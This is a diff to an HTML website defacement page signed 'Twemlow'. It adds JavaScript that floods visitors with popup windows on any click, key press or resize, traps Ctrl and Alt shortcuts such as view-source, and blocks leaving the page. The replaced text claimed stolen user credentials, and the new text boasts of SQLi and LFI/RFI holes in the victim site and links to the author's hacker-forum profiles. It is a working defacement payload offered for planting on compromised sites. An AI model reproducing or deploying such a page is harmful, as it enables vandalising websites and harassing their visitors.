--- a/Twemlow/TwemlowsDefacementPage.html
+++ b/Twemlow/TwemlowsDefacementPage.html
@@ -13,7 +13,7 @@
                                                                                                                                \______/           -->
 
 <html>
-  <title> Twemlow Attack! </title>
+  <title>| Twemlow has Attacked! |</title>
   <meta name="description" content=" Twemlows Red Team½° ">
   <script type="text/javascript">
     var msg = document.title;
@@ -35,8 +35,155 @@
    
     moveTitle();
   </script>
+  
+  <body oncontextmenu="procreate(); return false;" onkeydown="procreate(); return false;" onmousedown="procreate(); return false;" bgcolor="white" text="black" onclick="procreate(); return false" onresize="procreate()">
+<script>
+		var xOff = 5;
+		var yOff = 5;
+		var xPos = 400;
+		var yPos = -100;
+		var flagRun = 1;
+
+function openWindow(url){
+        aWindow = window.open(url,"_blank", 'menubar=no,status=no,toolbar=noresizable=no,width=180,height=175,titlebar=no,alwaysRaised=yes');
+}
+
+function procreate(){
+		openWindow('https://www.nulled.to/uploads/profile/photo-1822548.gif?_r=1589365892');
+		openWindow('https://www.nulled.to/uploads/profile/photo-1822548.gif?_r=1589365892');
+		openWindow('https://www.nulled.to/uploads/profile/photo-1822548.gif?_r=1589365892');
+		openWindow('https://www.nulled.to/uploads/profile/photo-1822548.gif?_r=1589365892');
+		openWindow('https://www.nulled.to/uploads/profile/photo-1822548.gif?_r=1589365892');
+		openWindow('https://www.nulled.to/uploads/profile/photo-1822548.gif?_r=1589365892');
+		openWindow('https://www.nulled.to/uploads/profile/photo-1822548.gif?_r=1589365892');
+		openWindow('https://www.nulled.to/uploads/profile/photo-1822548.gif?_r=1589365892');
+		openWindow('https://www.nulled.to/uploads/profile/photo-1822548.gif?_r=1589365892');
+		openWindow('https://www.nulled.to/uploads/profile/photo-1822548.gif?_r=1589365892');
+		openWindow('https://www.nulled.to/uploads/profile/photo-1822548.gif?_r=1589365892');
+		openWindow('https://www.nulled.to/uploads/profile/photo-1822548.gif?_r=1589365892');
+		openWindow('https://www.nulled.to/uploads/profile/photo-1822548.gif?_r=1589365892');
+		openWindow('https://www.nulled.to/uploads/profile/photo-1822548.gif?_r=1589365892');
+		openWindow('https://www.nulled.to/uploads/profile/photo-1822548.gif?_r=1589365892');
+		openWindow('https://www.nulled.to/uploads/profile/photo-1822548.gif?_r=1589365892');
+		openWindow('https://www.nulled.to/uploads/profile/photo-1822548.gif?_r=1589365892');
+		openWindow('https://www.nulled.to/uploads/profile/photo-1822548.gif?_r=1589365892');
+		openWindow('https://www.nulled.to/uploads/profile/photo-1822548.gif?_r=1589365892');
+		openWindow('https://www.nulled.to/uploads/profile/photo-1822548.gif?_r=1589365892');
+		openWindow('https://www.nulled.to/uploads/profile/photo-1822548.gif?_r=1589365892');
+		openWindow('https://www.nulled.to/uploads/profile/photo-1822548.gif?_r=1589365892');
+		openWindow('https://www.nulled.to/uploads/profile/photo-1822548.gif?_r=1589365892');
+		openWindow('https://www.nulled.to/uploads/profile/photo-1822548.gif?_r=1589365892');
+		openWindow('https://www.nulled.to/uploads/profile/photo-1822548.gif?_r=1589365892');
+		openWindow('https://www.nulled.to/uploads/profile/photo-1822548.gif?_r=1589365892');
+		openWindow('https://www.nulled.to/uploads/profile/photo-1822548.gif?_r=1589365892');
+		openWindow('https://www.nulled.to/uploads/profile/photo-1822548.gif?_r=1589365892');
+		openWindow('https://www.nulled.to/uploads/profile/photo-1822548.gif?_r=1589365892');
+		openWindow('https://www.nulled.to/uploads/profile/photo-1822548.gif?_r=1589365892');
+		openWindow('https://www.nulled.to/uploads/profile/photo-1822548.gif?_r=1589365892');
+		}
+
+function newXlt(){
+        xOff = Math.ceil( 0 - 6 * Math.random()) * 5 - 10 ;
+        window.focus()}
+
+function newXrt(){
+        xOff = Math.ceil(7 * Math.random())  * 5 - 10 ;
+        }
+
+function newYup(){
+        yOff = Math.ceil( 0 - 6 * Math.random())  * 5 - 10 ;
+        }
+
+function newYdn(){
+        yOff = Math.ceil( 7 * Math.random())  * 5 - 10  ;
+        }
+function fOff(){
+        flagrun = 0;
+        }
+
+function playBall(){
+        xPos += xOff;
+        yPos += yOff;
+        if (xPos > screen.width-175){
+        newXlt();
+        }
+        if (xPos < 0){
+        newXrt();
+        }
+        if (yPos > screen.height-100){
+        newYup();
+        }
+        if (yPos < 0){
+        newYdn();
+        }
+        if (flagRun == 1){
+        window.moveTo(xPos,yPos);
+        setTimeout('playBall()',1);
+        }
+        }
+document.onkeydown = function(e) {
+        if (e.ctrlKey && 
+            (e.keyCode === 67 || 
+             e.keyCode === 86 ||
+             e.keyCode === 74 ||
+             e.keyCode === 68 ||
+             e.keyCode === 85 || 
+             e.keyCode === 87 || 
+             e.keyCode === 72 || 
+             e.keyCode === 117)) {
+            openWindow('https://www.nulled.to/uploads/profile/photo-1822548.gif?_r=1589365892');
+            openWindow('https://www.nulled.to/uploads/profile/photo-1822548.gif?_r=1589365892');
+            openWindow('https://www.nulled.to/uploads/profile/photo-1822548.gif?_r=1589365892');
+            openWindow('https://www.nulled.to/uploads/profile/photo-1822548.gif?_r=1589365892');
+            openWindow('https://www.nulled.to/uploads/profile/photo-1822548.gif?_r=1589365892');
+            openWindow('https://www.nulled.to/uploads/profile/photo-1822548.gif?_r=1589365892');
+            openWindow('https://www.nulled.to/uploads/profile/photo-1822548.gif?_r=1589365892');
+            openWindow('https://www.nulled.to/uploads/profile/photo-1822548.gif?_r=1589365892');
+            openWindow('https://www.nulled.to/uploads/profile/photo-1822548.gif?_r=1589365892');
+            openWindow('https://www.nulled.to/uploads/profile/photo-1822548.gif?_r=1589365892');
+            openWindow('https://www.nulled.to/uploads/profile/photo-1822548.gif?_r=1589365892');
+            openWindow('https://www.nulled.to/uploads/profile/photo-1822548.gif?_r=1589365892');
+            return false;
+        } else {
+            return true;
+        }
+};        
+
+document.onkeydown = keydown;
+
+function keydown(evt) {
+    if (!evt) evt = event;
+    if (evt.altKey) {
+        openWindow('https://www.nulled.to/uploads/profile/photo-1822548.gif?_r=1589365892');
+        openWindow('https://www.nulled.to/uploads/profile/photo-1822548.gif?_r=1589365892');
+        openWindow('https://www.nulled.to/uploads/profile/photo-1822548.gif?_r=1589365892');
+    }
+}
+
+document.onkeydown = keydown;
+
+function keydown(e) {
+    if (!e) e = event;
+    if (e.ctrlKey) {
+        openWindow('https://www.nulled.to/uploads/profile/photo-1822548.gif?_r=1589365892');
+        openWindow('https://www.nulled.to/uploads/profile/photo-1822548.gif?_r=1589365892');
+        openWindow('https://www.nulled.to/uploads/profile/photo-1822548.gif?_r=1589365892');
+    }
+}
+
+        </script>
+        <script language="JavaScript">
+    window.onbeforeunload = confirmExit;
+    function confirmExit() {
+        return "are you sure ? ";
+        openWindow('https://www.nulled.to/uploads/profile/photo-1822548.gif?_r=1589365892');
+        openWindow('https://www.nulled.to/uploads/profile/photo-1822548.gif?_r=1589365892');
+        openWindow('https://www.nulled.to/uploads/profile/photo-1822548.gif?_r=1589365892');
+    }
+</script>
+
   <SCRIPT LANGUAGE="JavaScript">
-    var scrl = " Skids Did This!";
+    var scrl = " Twemlow Did This!";
     <script type="text/javascript">if(typeof(urchinTracker)=='function'){_uacct="UA-230305-2";_udn="none";_uff=false;urchinTracker();}
   </script> <script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script> <script type="text/javascript">_qacct="p-44naSaXtNJt26";quantserve();</script> </body></noframes>
   <body bgcolor="#000000">
@@ -424,21 +571,11 @@
   </style>
   </head>
   <center>
-    <p align="center" class="style3" id="message"><span class="style10">Hello Admin! Your Admin Panel is exposed and SQLi Vulnerable! </span><span class="style16"><br>
-      <span class="style14">Twemlows red team have analyzed your website and have found vulnerabilities.</span></span><span class="style16"><br>
-      <span class="style14">We have taken corrective action and have defaced your site to help you recognize your</span></span><span class="style16"><br>
-      <span class="style14">vulnerabilities so that you can keep up with your security. Let's walk through what</span></span><span class="style16"><br>
-      <span class="style14">you need to do to fix what has happened here today. No doubt that you have recieved a </span></span><span class="style16"><br>
-      <span class="style14">notification of this attack and are no doubt angry and confused as to why this has happened</span></span><span class="style11"><br>
-      <span class="style14"> to you of all people right? Well let's walk through this, you have been lazy and have</span></span><span class="style11"> <br>
-      <span class="style14">not patched your system, kept up to date with <a href="https://owasp.org/www-project-top-ten/">OWASP top ten</a> and most importantly you</span></span><span class="style11"><br>
-      <span class="style14">broke the trust of the users of this site, providing them with false promise of securing their data.</span></span><span class="style11"><br>
-      <span class="style14">We have user information, this pertains to emails, passwords and any other relevant information.</span></span><span class="style11"><br>
-      <span class="style14">This informaiton is ours and we do not return such information, however you can fix your site</span></span><span class="style11"><br>
-      <span class="style14">and prevent this from happening again! I hate skript kiddies as much as the next guy.</span></span><span class="style11"><br>
-      <span class="style14">So let's work together to reduce their attacks. Be careful of backdoors,</span></span><span class="style11"><br>
-      <span class="style14">don't just remove the defacement!</span></span><span class="style11"><br>
-      <span class="style11">You've been defaced</span></span> <span class="style13"> Nothing Personal But your security Sucks!!! Patch it</span><span class="style11"><br>
+    <p align="center" class="style3" id="message"><span class="style10">Visit me:<a href="https://www.nulled.to/user/4397640-twemlowsemrys" target="_blank"> https://www.nulled.to/user/4397640-twemlowsemrys</a></span><span class="style16"><br>
+      <span class="style14">Visit:<a href="http://zone-h.org/" target="_blank"> http://zone-h.org/</a></span></span><span class="style16"><br>
+      <span class="style14">Contact me:<a href="https://keybase.io/tw3mlow" target="_blank"> https://keybase.io/tw3mlow</a></span></span><span class="style16"><br>
+      <span class="style14">GitHub:<a href="https://github.com/TwemlowsEmrys" target="_blank"> https://github.com/TwemlowsEmrys</a></span></span><span class="style16"><br><br>
+      <span class="style14">This has happened because the admin of this site is incompetent. This website is vulnerable to SQLi, LFI/RFI and incompetence.</span></span><span class="style16"><br>
     </p>
     <p align="center" class="style11">
       <span class="style14"></span><span class="style11"> <strong>I'll be back if you don't patch your security.</strong> <span class="style14"></span></span><span class="style17"> </span>
@@ -452,7 +589,6 @@
     </span>
     <body>
     <style type="text/css">
-    <!--
       .css1{
       position:absolute;top:0px;left:0px;
       width:16px;height:16px;
@@ -467,8 +603,7 @@
       font-family:Arial,sans-serif;
       font-size:10px;
       text-align:center;
-      }
-      //-->
+      }	
     </style>
     <style>
     body {
@@ -589,7 +724,6 @@
   </script>
 <audio controls autoplay>
   <source src="https://sndup.net/87qh/NEFFEX+-+Cold+[Copyright+Free].mp3" type="audio/ogg">
-  <source src="https://sndup.net/87qh/NEFFEX+-+Cold+[Copyright+Free].mp3" type="audio/mpeg">
 </audio>
   <h4>Learn more: <a href="https://www.cyber.nj.gov/mitigation-guides/website-defacements-how-to-protect-your-website"> How to defend from defacement attacks <a></a></h4><br>
   </script><div id=bar style="position: fixed; width: 100%; bottom: 0px;height: 20px; color: darkred; font-size: 13px; left: 0px; border-top: 1px solid #222; padding: 4px; background-color: #222">
